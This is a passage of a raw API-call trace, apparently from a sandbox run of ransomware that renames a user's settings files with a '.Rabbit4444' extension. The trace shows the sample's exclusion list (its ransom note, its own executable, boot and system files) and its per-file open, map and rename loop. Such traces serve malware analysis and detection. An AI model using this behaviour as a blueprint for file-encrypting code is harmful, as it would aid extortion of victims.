lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0059.049] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.049] CloseHandle (hObject=0x298) returned 1 [0059.049] CloseHandle (hObject=0x278) returned 1 [0059.049] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms.Rabbit4444") returned 192 [0059.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7e5bc096-f558-419a-9326-bc6414d592c3}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7e5bc096-f558-419a-9326-bc6414d592c3}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a03ea9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52a03ea9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", cAlternateFileName="CLCC77~1.SET")) returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2=".") returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="..") returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="windows") returned -1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="boot") returned 1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.050] lstrcmpiW (lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.050] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms" | out: lpString1="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms") returned="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms" [0059.051] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.051] lstrlenW (lpString="Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms") returned 64 [0059.051] lstrlenW (lpString="Rabbit4444") returned 10 [0059.051] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.051] lstrlenW (lpString=".dll") returned 4 [0059.051] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.051] lstrlenW (lpString=".lnk") returned 4 [0059.051] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.051] lstrlenW (lpString=".ini") returned 4 [0059.051] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.051] lstrlenW (lpString=".sys") returned 4 [0059.051] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7f8b6c83-2a89-47a0-b334-aa58d042cdec}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.052] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.052] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15036252444) returned 1 [0059.052] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=983) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.052] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.052] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.057] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.058] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.058] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.059] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15036951399) returned 1 [0059.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.059] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.059] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.059] CloseHandle (hObject=0x298) returned 1 [0059.059] CloseHandle (hObject=0x278) returned 1 [0059.059] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms.Rabbit4444") returned 192 [0059.059] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7f8b6c83-2a89-47a0-b334-aa58d042cdec}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7f8b6c83-2a89-47a0-b334-aa58d042cdec}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.060] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a9c7f6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52a9c7f6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", cAlternateFileName="CLE0F1~1.SET")) returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2=".") returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="..") returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="windows") returned -1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="boot") returned 1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.060] lstrcmpiW (lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.060] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms" | out: lpString1="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms") returned="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms" [0059.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.061] lstrlenW (lpString="Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms") returned 64 [0059.061] lstrlenW (lpString="Rabbit4444") returned 10 [0059.061] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.061] lstrlenW (lpString=".dll") returned 4 [0059.061] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.061] lstrlenW (lpString=".lnk") returned 4 [0059.061] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.061] lstrlenW (lpString=".ini") returned 4 [0059.061] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.061] lstrlenW (lpString=".sys") returned 4 [0059.061] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8050502b-9b94-408c-bf49-d2d8887c1bcf}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.061] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.061] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15037201645) returned 1 [0059.061] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1020) returned 1 [0059.061] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0059.061] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.061] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.062] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.063] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.064] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15037469630) returned 1 [0059.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.064] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.064] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.064] CloseHandle (hObject=0x298) returned 1 [0059.064] CloseHandle (hObject=0x278) returned 1 [0059.064] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms.Rabbit4444") returned 192 [0059.064] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8050502b-9b94-408c-bf49-d2d8887c1bcf}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8050502b-9b94-408c-bf49-d2d8887c1bcf}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.065] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b5b3cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52b5b3cf, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x373, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", cAlternateFileName="CLED1A~1.SET")) returned 1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2=".") returned 1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="..") returned 1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="windows") returned -1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.065] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.066] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="boot") returned 1 [0059.066] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.066] lstrcmpiW (lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.066] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms" | out: lpString1="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms") returned="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms" [0059.066] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.066] lstrlenW (lpString="Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms") returned 64 [0059.066] lstrlenW (lpString="Rabbit4444") returned 10 [0059.066] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.066] lstrlenW (lpString=".dll") returned 4 [0059.066] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.066] lstrlenW (lpString=".lnk") returned 4 [0059.066] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.066] lstrlenW (lpString=".ini") returned 4 [0059.066] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.066] lstrlenW (lpString=".sys") returned 4 [0059.066] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.066] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.067] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15037728096) returned 1 [0059.067] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=883) returned 1 [0059.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.067] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x680, lpName=0x0) returned 0x298 [0059.068] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x680) returned 0x70000 [0059.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.069] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15037975071) returned 1 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.069] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.069] CloseHandle (hObject=0x298) returned 1 [0059.069] CloseHandle (hObject=0x278) returned 1 [0059.069] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms.Rabbit4444") returned 192 [0059.069] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.070] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bf3d8c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52bf3d8c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", cAlternateFileName="CLBF66~1.SET")) returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2=".") returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="..") returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="windows") returned -1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="boot") returned 1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.074] lstrcmpiW (lpString1="Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms", lpString2="NTUSER.DAT") returned 